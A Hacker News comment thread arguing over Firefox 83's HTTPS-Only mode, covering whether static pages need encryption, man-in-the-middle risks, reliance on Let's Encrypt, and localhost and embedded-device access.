I agree. HTTPS is great, at definitely needed for a lot of things. But I don't need my cat pictures encrypted, I don't need lots of things encrypted, and frankly, I don't want it to be encrypted when it's not required, it's a waste of resources, both processing and network.

Then there is the case of all the old computers that either lack the processing power or support for modern algorithms.


If a page doesn't use HTTPS, even if it is cats, you cannot trust that the traffic has not been modified in transit. You try to load a cat but a network attacker can add malware or mining code or a worse exploit.

Every page needs HTTPS because you can't trust any content sent to you over HTTP. You don't know if it's "just a cat picture."


Only routing owners can modify the cat picture, do you think they can afford to when the browser does not "run" the cat picture?


Image decoders occasionally have RCE vulnerabilities.


I think the solution in this case is to not execute code in pictures rather than removing HTTP?

Also I'm starting to suspect the downvoting feature is used a sadistic tool, just keeping karma up so you can punish people.


They don't intentionally execute any code, they do sometimes have a vulnerability that allows memory corruption in a way that can be exploited to run attacker-provided code.

If you're not familiar with this omnipresent class of exploit, I wouldn't hope for many people on HN to take your advice on whether a security measure is needed or not seriously. Even if your comments were underlined and flashing on the page instead of grayed out.


I'd be more receptive to this if ISPs weren't snooping on traffic and selling their customer's browsing history. As long as we have to operate under the assumption that every scrap of data we send or request will be picked apart and used against us whenever possible I'd rather encrypt everything and have a little less to worry about.


Perhaps you should get some better laws in your country to prevent this, instead of ruining the web for the rest of the world?


Sorry to burst your bubble, but intelligence agencies are going to be monitoring your traffic regardless. The Internet is a global network; laws in specific countries or economic zones don't affect data in transit through other parts of the world.


When there's executable code there needs to be encryption.

JS HTML CSS WASM etc ...all need to be tamper-resistant.

Processing power, meh. More of an issue is older devices not getting the updates to software for the newer algorithms, and not getting the updated certificates. I got rid of a perfectly good tablet for just this reason. A bit slow perhaps but workable.


You don't need your cat pictures encrypted per se, but you do want to ensure that your Webportal cannot MITM your communications with catpictures.com and inject malicious javascript into the webpage.


In an adversarial situation, you also want your opponent to spend time and resources storing or cracking gigabytes of cat pictures for every kilobyte of email they get.


Here is the thing. If you enter domain.com into the address bar of your browser, your browser will always go to the http site unless you do HSTS preloading. Your first visit to a website is not secured by https. So lots of people do a http -> https redirect, which means you can do a man in the middle attack on the http port and the HSTS header will never get loaded in the first place. https is significantly less effective than it should be.


> I don't need my cat pictures encrypted

Because all images are of cats or it's easy to tell when it's sensitive and when not.


Using https is making the web a monoculture?


It obviously is. Having just an HTML site now becomes more expensive for no clear reason. Which makes more sense for people to check out Gemini.


What makes it more expensive? A certificate is free (With LE or self-signed), the performance impact is negligible and there's a clear reason for why everyone should be using it.


It does add a "tax" of sort in the form time or attention that must be paid to keep a website up. You can't just sling some files in a directory and be done -- you have to pay for certificates or pay (in time and executable capability) to keep LetsEncrypt up to date.

And, as wonderful as LetsEncrypt is, it's not forever. At some point, they're gonna' get tired of messing with it or it will get taken over by private equity (see .org) and for whatever reason, it won't work any more.

And sure, that's always been true, new stuff obsoletes old and things fall by the wayside. But my current browser can access modern websites as well as sites from the dawn of the Web. But FireFox 85, 87 or 90 will probably make https mandatory -- and that amazing continuity is gone.


There are good reasons to insist on the use of HTTPS for all sites on the public web, with no exceptions or excuses. This topic has cropped up before:

https://news.ycombinator.com/item?id=21912817

https://news.ycombinator.com/item?id=24640183

https://news.ycombinator.com/item?id=22147858


These links list literally SOME and not ALL cases that need encryption.


I'm afraid I don't see your point here, please elaborate.


Your point is "this should be applied to ALL sites", while your argument for it is "because it is relevant for SOME sites".


Not so. In the top link, points 2, 3, and 5, apply to all public websites.


You cannot say that certificates are reliably free (especially in the long run), if there's only one entity providing them and that entity is dependent on corporate sponsors.


Tons of major websites rely on Let's Encrypt, so I think it's fair to say that they're probably not going anywhere soon. Free certificates are now standard on services like Cloudflare and Google App Engine. I think that AWS can generate free ones too.


We can't say that a true statement is true just because there's a chance that at some point it becomes false?


By that logic Lehman Brothers stock was a great investment on the 14 September 2008.


Not everyone needs HTTPS, in spite of what the HN mantra says.

Some websites are the equivalents of billboards.

The cost is dependence on a central authority that can make your site inaccessible in a whim.


You're aware that Gemini mandates a recent version of TLS in the protocol specification, right?


Self-signed certificates are first class citizens. Section 4.2 of the spec.


It's part of the culture of making everything web terribly complicated, which has resulted in the death of all but three web browsers.

It's now practically impossible to write a new web browser from scratch, unless you're a mega corp with endless resources and a grudge against Google, and they're still adding more complexity every day.


The web started out as a very optimistic project with no security and a lot based on trust. As it evolved a lot of security had to be bolted on which now makes it a bit more complicated than in the early days. But what's the alternative?

Of course a perfect protocol where nothing needs to be added later would be great, but that's not very realistic.


The problem isn't just HTTPS, it's the ever-expanding array of various APIs and technologies that "must" be implemented to be a "real" or "complete" browser. Even Firefox, that's been around for a long time and has a fairly large mind share, is at best an afterthought in many web projects.

The amount of APIs that need to be implemented to be considered even a basic web browser is so huge that it's not an approachable project for just about any organization, and as an individual it's just not possible.


Supporting TLS is a cakewalk compared to handling modern HTML/JS/etc. This has nothing to do with the browser monoculture.


Gemini is a monoculture. They almost say it in the FAQ:

> 2.5 Why not just use a subset of HTTP and HTML?

> [...] The problem is that deciding upon a strictly limited subset of HTTP and HTML, slapping a label on it and calling it a day would do almost nothing to create a clearly demarcated space where people can go to consume only that kind of content in only that kind of way. [...]

The protocol itself has very strong opinions on what is allowed and what is not. It is simple but mandates TLS (so, not simple), because authors think encryption is important but other things are not. It is also deliberately non-extensible.

Not saying it is a bad thing, I mean, they didn't hurt anyone. But that protocol is clearly intended as a rallying point for like-minded individuals rather than something for everyone to use.


Have been using HTTPS Everywhere from some time. The worst are sites which have https but not configured properly - cert for wrong domain or expired.


The Firefox versioning numbers are lost on me.

I have no idea of the importance between 83 vs 80.


83 - 80 = 3

Therefore version 83 is 3 versions ahead of version 80. Note that "version" in this context is shorthand for "major version". It does not include minor patches that only fix a bug or security issue.

Each new major version of Firefox comes with new features and may occasionally deprecate or remove old features. They are currently released roughly every 4 weeks.


cant wait to restart the browser when im in the middle of something important


As long as there is an escape hatch this is great. I absolutely loathe having to setup http to https redirects because it means the first visit for many users is completely unsecured. HSTS preloading is a hack. Why not just connect to https first?


What happens if i need to access localhost on http?


You could start by reading the article, even only the first paragraph:

> Firefox asks for your permission before connecting to a website that doesn’t support secure connections.


It could be a bit smarter and detect if connection is to a local server.


No need for snark. It's a legit question and buildfocus's answer below is relevant:

"browsers generally treat localhost and/or 127.0.0.1 as secure origins in themselves anyway"


I have read it, I was wondering about localhost explicitly.


As other posters mention, you can disable this when you need to, but also browsers generally treat localhost and/or 127.0.0.1 as secure origins in themselves anyway, so I suspect that won't be necessary. See https://developer.mozilla.org/en-US/docs/Web/Security/Secure...:

> Locally-delivered resources such as those with http://127.0.0.1 URLs, http://localhost and http://*.localhost URLs (e.g. http://dev.whatever.localhost/), and file:// URLs are also considered to have been delivered securely.


As described in the article HTTPS-Only mode is opt in, you can also disable it at will, you can add exceptions on a site-by-site basis, and even when it's on you are prompted on whether or not you wish to proceed to non-HTTPS sites.


My guess is that either there's a built-in rule for that, or you can just click the "Continue to HTTP Site" button like in the screenshot.


It's explained in the post:

> For the small number of websites that don’t yet support HTTPS, Firefox will display an error message that explains the security risk and asks you whether or not you want to connect to the website using HTTP. Here’s what the error message looks like: ..


"Firefox asks for your permission before connecting to a website that doesn’t support secure connections."

That suggests it will ask you for permission, presumably with a "always remember this choice" option.


It would help greatly if this kind of things (that and security exceptions would not apply to any host in the RFC1918 address space. Would make life easier for IT dept around the world.


From the article: Firefox asks for your permission before connecting to a website that doesn’t support secure connections.


It will probably be a hardcoded exception, just like for enabling microphone/webcam access and other features today.


To add to this: What interests me is how will they handle accessing the management interface of routers and various network equipment once HTTP gets deprecated.


Just tried it after enabling the feature - No message, accessing localhost works just fine over http.


...and I still still http-only sites from time to time.


Your post is brief, and has a grammar error that makes it harder to understand.


the second "still" is meant to be "sell" or "make".


That helps a bit. I could be wrong, but I think the common belief is that professionally-developed HTTP-only sites don't really have a place anymore on the 2020s internet due to HTTP/2, security, referral tracking, and SEO limitations.


I think it means "see"


That makes a lot more sense than my suggestions.


Upon launch, Firefox 83 displays essentially a full-page ad for Pocket, with a tiny link at the bottom (have to scroll to it) to get the release notes for “what else” is new in Firefox.

So all kinds of significant enhancements in 83, including HTTPS mode, might essentially be missed by most users. (Heck, I only knew because of this HN post.)

Why do programs insist on “hijacking” things? Release notes seem particularly vulnerable to this, e.g. iPhone apps love to have “notes” that don’t actually tell you anything at all, just marketing-speak.


There had better be an about:config option to turn this stupidity off.

Perhaps one of the downvoters can explain why the implied opinion "Nobody should be able to access your site without clearance from a third-party gatekeeper" belongs on a site called "Hacker News."

And no, it won't be opt-in for long. Read the rest of the page: "Once HTTPS becomes even more widely supported by websites than it is today, we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites. In summary, HTTPS-Only Mode is the future of web browsing!"

This is something you should be speaking up against.


> Perhaps one of the downvoters can explain why the implied opinion "Nobody should be able to access your site without clearance from a third-party gatekeeper" belongs on a site called "Hacker News."

I didn't vote down, but ironically this is news to real hackers who will have a harder time doing mitm downgrade attacks once this is widespread.

I believe that web browsers should alert users if a website uses a less secure protocol than "nearly all" of the rest of the websites they visit, for some value of "nearly all".

It's not preventing the user from visiting, just saying "heads up, the assumptions you make about the websites you visit don't hold for this one."


Which means any pure HTML resources would either have to rely on let’s encrypt or pony up some certificate money. So basically a death knell for homepages.


Why does relying on Let’s Encrypt entail the death knell for homepages? I respect the whole gatekeeping argument, but homepages will still be around.


Because relying only a single entity sponsored by corporations to protect people from corporate gatekeeping seems like a dumb idea in the long run.


especially if the diplayed warning looks like a "ThIs Is An InSeCuRe SiTe" warning. self signed cert? WaRnInG!!!111eleven no https? WaRnInG!!!111eleven cert expired 2 hours ago? WaRnInG!!!111eleven


HTTPS is not about gatekeeping, you can use "let's encrypt" for free certificates for any domain.

HTTPS-only is about forcing all traffic to be encrypted by banning clear-text traffic. I've been using the "HTTPS everywhere" extension for years and it's great.


yes it is. someone has to give you a certificate which the users browser accepts. even if its free today.

lets say a simple website which someone uses to display some holiday pictures. why would we need https here, if there is no login or anything like that?

it just adds an extra hurdle for not so tech-savvy users and increases the trend to abolish small private websites.


I don't know. Let's say that some non-technical family member goes to this site intending to look at vacation pictures.

Imagine if those pictures have been replaced by something else. If you can't think of a long list of replacement images that could be very useful for a spearphishing attack, then you're not having enough imagination.

This attack could also be used to get the poster of the photos in trouble.


If my choices are to implement a security control which forces a layer of security, or forgo that security control so Alice can upload her Holiday pictures to a host which doesn’t support HTTPS either, I know which one I’ll pick. Alice should either host her photos on Instagram, or learn how to run letsencrypt.

The day where certs are no longer freely obtainable is the day another self governed free TLS provider will appear and force their way into the market by providing installers to inject CAs into system cert stores.

There’s always TOR if you disagree.


> Alice should either host her photos on Instagram, or learn how to run letsencrypt.

Both leading to further centralisation of the Internet.

> by providing installers to inject CAs into system cert stores

That's already pointless on Android, user-installed CAs are ignored by default unless an app developer opts in to using them.

Once we go down this path there's no turning back to the user-centric Web of the 1990s / 2000s


> That's already pointless on Android, user-installed CAs are ignored by default unless an app developer opts in to using them.

And? App developers should opt in to ignoring transport security. I’m sure a bunch of Android shitware attempts to install CAs either via user interaction or exploitation.

> Once we go down this path there's no turning back to the user-centric Web of the 1990s / 2000s

The landscape we live in now is very different to then. I’m all for a free web, but not at the cost of security. The web is now a multi billion trillion dollar industry. Weakening security just so Bob can see Alices’ holiday pics in situation where Alice can’t figure out letsencrypt, is frankly unhinged.

If you want a ‘free web’ you’re welcome to disable any HTTPS enforcement and disable TLS cert checking entirely. Hell, fork a browser, be very clear about the security weaknesses and publish on github if you feel that strongly, I’ll even star it for you.


The web is now a multi billion trillion dollar industry.

Maybe your web service is, but mine isn't. Mine is a specialized embedded device server that now has an expiration date for no reason on God's green earth.


Feel free to fork Mozilla codebases if you disagree with fundamental security concepts.


As a visitor to the website, how can I be sure it's only holiday pictures ? If I get to your friendly website and it asks me for private information, and I'm willing to give it because I trust you, what tells me only you will receive it ? How do I know it's your holiday pictures, and not some scam someone else wants to trick me into ?


Here's a novel idea: how about popping up scary warnings when an insecure site asks for information, as opposed to if the insecure site merely exists?

Static content does not need https unless there are reasons for privacy or MiTM concerns related to the nature of the content itself.


But you don't know if it's the real content. There's a problem even before entering information. What tells me it's your holiday pictures and not someone else's, and a person in the middle wants to tarnish your name ? What if your ISP/your hosting provider adds ads in the page, or a MiTM adds a link to a scam site ?


Of all the parts invloved in setting up a web server, is adding a letsencrypt a significant further barrier? In what situation would a non-tech-savvy user ever be doing that in the first place?


Hint: not all web servers run inside Facebook or Google or Amazon data centers. Some of them run inside individual devices, which will now end up in the landfill once their certificates expire. Many such devices were, and are, just fine running plain old HTTP, but now they're all going to be subject to service life limits imposed by a third-party authority.

This is not how this was supposed to work. This is not how any of this was supposed to work. But it's hard to voice any objections over the proverbial thunderous applause.


I can MitM that site and add login or arbitrary content.


> HTTPS-only is about forcing all traffic to be encrypted by banning clear-text traffic

Banning clear text might work for browsers but it would disable ACME clients that rely on plain http to initiate a certificate request from Let's Encrypt.


You can use let's encrypt... until you can't. And then, after all browsers had deprecated HTTP, it will be time to seriously rake all website owners for certificate money. It is pretty brilliant, if you ask me.


Turn what stupidity off? The menu item that you can use to opt in to it?


Did you read the article? It clearly states it's opt-in.


At first it's opt-in then it becomes the default setting. Are you a developer? If you are then you should be used to thinking at least 2 steps ahead and just seeing what's literally visible in front of you.


I kind of agree, I don't want to have to click through warnings all the time to do my job. Just re-architect everything to have legit public domain names and network access to get a let's encrypt cert, yeah right I'll get right on that.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: